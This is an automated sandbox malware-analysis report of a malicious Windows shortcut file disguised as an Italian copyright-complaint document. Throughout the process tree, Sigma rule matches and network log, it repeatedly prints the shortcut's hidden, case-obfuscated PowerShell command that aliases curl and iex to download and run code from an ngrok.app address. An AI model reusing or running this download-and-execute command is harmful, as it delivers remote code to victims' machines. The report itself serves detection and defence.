Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk

Overview

General Information

Sample name:File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnk
Analysis ID:1578153
MD5:3c56fd0e1bbabcfdeaabe5ee6e29bfa7
SHA1:1376441bc8171553125dac0415240a81859ee8f7
SHA256:0c64dd1718afa8b2cceb2727a322ddb14f595b29426c0c018a2231e61a73f6e5
Infos:

Detection

Score:72
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Windows shortcut file (LNK) starts blacklisted processes
Machine Learning detection for sample
PowerShell case anomaly found
Suspicious powershell command line found
Windows shortcut file (LNK) contains suspicious command line arguments
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Invoke-WebRequest Execution With DirectIP
Sigma detected: Usage Of Web Request Commands And Cmdlets
Uses a known web browser user agent for HTTP communication

Classification

  • System is w10x64native
  • cmd.exe (PID: 7756 cmdline: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing) MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 1492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)
    • powershell.exe (PID: 1952 cmdline: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing) MD5: 04029E121A0CFA5991749937DD22A1D9)
  • cleanup
No configs have been found
No yara matches

System Summary

barindex
Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7756, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 1952, ProcessName: powershell.exe
Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4984, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 7756, ProcessName: cmd.exe
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), CommandLine|base64offset|contains: F,, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 7756, ParentProcessName: cmd.exe, ProcessCommandLine: pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing), ProcessId: 1952, ProcessName: powershell.exe
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkVirustotal: Detection: 35%Perma Link
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkReversingLabs: Detection: 18%
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkJoe Sandbox ML: detected
Source: unknownHTTPS traffic detected: 3.13.191.225:443 -> 192.168.11.20:49755 version: TLS 1.2
Source: Joe Sandbox ViewIP Address: 3.13.191.225 3.13.191.225
Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global trafficHTTP traffic detected: GET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: 5awvoe1sr8b6b5g9cfxz.ngrok.appConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /api/secure/dbd47cba3990bb15d4c46069a75f50be HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-GB) WindowsPowerShell/5.1.19041.1151Host: 5awvoe1sr8b6b5g9cfxz.ngrok.appConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: 5awvoe1sr8b6b5g9cfxz.ngrok.app
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeContent-Type: text/plainNgrok-Error-Code: ERR_NGROK_3200Date: Thu, 19 Dec 2024 09:47:00 GMTContent-Length: 67
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkString found in binary or memory: https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownHTTPS traffic detected: 3.13.191.225:443 -> 192.168.11.20:49755 version: TLS 1.2

System Summary

barindex
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkLNK file: /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: classification engineClassification label: mal72.winLNK@4/3@1/1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1492:304:WilStaging_02
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvwbeczc.zle.ps1Jump to behavior
Source: C:\Windows\System32\conhost.exeFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkVirustotal: Detection: 35%
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkReversingLabs: Detection: 18%
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: File di reclamo per violazione del copyright File di reclamo per violazione del copyright.lnk.d.lnkLNK file: ..\..\..\..\Windows\System32\cmd.exe
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

Data Obfuscation

barindex
Source: unknownProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe pOweRsHeLL -wIndoWStYLe hiDdeN -c set-alias aac6e2 curl ; sal av2db7 iEx ; av2db7(aac6e2 -Uri https://5awvoe1sr8b6b5g9cfxz.ngrok.app/api/secure/dbd47cba3990bb15d4c46069a75f50be -UseBasicParsing)Jump to behavior

Persistence and Installation Behavior

barindex
Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9921Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1800Thread sleep count: 9921 > 30Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
